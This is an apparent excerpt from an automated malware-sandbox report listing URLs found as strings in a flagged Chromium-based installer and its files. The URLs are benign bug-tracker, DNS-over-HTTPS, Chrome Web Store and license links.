Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/1085 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/1452 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/1452expandIntegerPowExpressionsThe |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/1512 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/1637 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/1936 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/2046 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/2152 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/2152skipVSConstantRegisterZeroIn |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/2162 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/2273 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/2517 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/2894 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/2970 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/2978 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3027 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3045 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3078 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3205 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3206 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3246 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3246allowClearForRobustResourceInitSome |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3452 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3498 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3502 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3577 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3584 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3586 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3623 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3624 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3625 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3682 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3682allowES3OnFL100Allow |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3729 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3832 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3862 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3965 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3970 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/3997 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4214 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4267 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4324 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4384 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4405 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4428 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4551 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4633 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4646 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4722 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/482 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4836 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4901 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/4937 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5007 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5007disableDrawBuffersIndexedDisable |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5055 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5061 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5281 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5371 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5375 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5421 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5430 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5469 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5535 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5577 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5658 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5658forceGlErrorCheckingForce |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5750 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5750forceRobustResourceInitForce-enable |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5881 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5901 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/5906 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6041 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6041forceInitShaderVariablesForce-enable |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6048 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6141 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6248 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6439 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6651 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6692 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6755 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6860 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6876 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6878 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6929 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/6953 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7036 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7036Frontend |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7047 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7172 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7279 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7279cacheCompiledShaderEnable |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7370 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7406 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7488 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7527 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7553 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7556 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7724 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://anglebug.com/7724disableAnisotropicFilteringDisable |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/1094869 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/110263 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/1144207 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/1165751 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/1165751disableProgramBinaryDisable |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/1171371 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/1181068 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/1181193 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/308366 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/403957 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/550292 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/565179 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/642227 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/642605 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/644669 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/650547 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/672380 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/709351 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/797243 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/809422 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/830046 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/849576 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/883276 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/927470 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/941620 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://crbug.com/941620allowTranslateUniformBlockToStructuredBufferThere |
Source: elevate.exe.0.dr |
String found in binary or memory: http://int3.de/ |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: http://issuetracker.google.com/200067929 |
Source: SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe |
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError |
Source: powershell.exe, 0000000F.00000002.2450786406.0000014291D55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2436690487.00000142835D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2450786406.0000014291C12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B96A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000012.00000002.2565356773.000001E0B9620000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000000F.00000002.2436690487.0000014281BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B7D61000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000F.00000002.2436690487.00000142832B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000012.00000002.2565356773.000001E0B9620000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000000F.00000002.2436690487.0000014281BA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B7D61000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://alekberg.net/privacy |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://alekberg.net/privacyalekberg.net |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/4674 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/4849 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/5140 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/5536 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/5845 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7161 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7162 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7246 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7246enableCaptureLimitsSet |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7308 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7319 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7320 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7369 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7382 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7405 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7489 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7604 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7714 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://anglebug.com/7763 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://bugs.fuchsia.dev/p/fuchsia/issues/detail?id=107106 |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://chrome-devtools-frontend.appspot.com/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://chrome.cloudflare-dns.com/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0 |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://chrome.google.com/webstore/category/extensions |
Source: fr.pak.0.dr |
String found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u |
Source: fr.pak.0.dr |
String found in binary or memory: https://chrome.google.com/webstore?hl=frRaccourci |
Source: sw.pak.0.dr |
String found in binary or memory: https://chrome.google.com/webstore?hl=swUmeondoa |
Source: zh-CN.pak.0.dr |
String found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN |
Source: zh-CN.pak.0.dr |
String found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivity |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://chromium.dns.nextdns.io |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://chromium.googlesource.com/angle/angle/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://cleanbrowsing.org/privacy |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://cleanbrowsing.org/privacyCleanBrowsing |
Source: powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000012.00000002.2608970599.000001E0C7F14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/1042393 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/1046462 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/1060012 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/1091824 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/1137851 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/1300575 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/593024 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/593024selectViewInGeometryShaderThe |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/650547 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/650547callClearTwiceUsing |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/655534 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/655534useSystemMemoryForConstantBuffersCopying |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/705865 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/710443 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/811661 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://crbug.com/848952 |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://developers.google.com/speed/public-dns/privacy |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns.google/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns.quad9.net/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe:: |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns.sb/privacy/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns10.quad9.net/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10 |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns11.quad9.net/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd4 |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dns64.dns.google/dns-query |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://dnsnl.alekberg.net/dns-query |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh-01.spectrum.com/dns-query |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh-02.spectrum.com/dns-query |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.cox.net/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30 |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.dns.sb/dns-query |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.familyshield.opendns.com/dns-query |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.opendns.com/dns-query |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.quickline.ch/dns-query |
Source: Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://doh.xfinity.com/dns-query |
Source: powershell.exe, 00000012.00000002.2565356773.000001E0B9620000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B946C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000000F.00000002.2436690487.0000014282D5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2565356773.000001E0B8992000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/161903006 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/166809097 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/184850002 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/187425444 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/220069903 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/220069903emulatePixelLocalStorageEmulate |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/229267970 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/250706693 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/253522366 |
Source: libGLESv2.dll.0.dr |
String found in binary or memory: https://issuetracker.google.com/issues/166475273 |
Source: zh-CN.pak.0.dr, fr.pak.0.dr, sw.pak.0.dr |
String found in binary or memory: https://myactivity.google.com/ |
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp |
String found in binary or memory: https://nextdns.io/privacy |
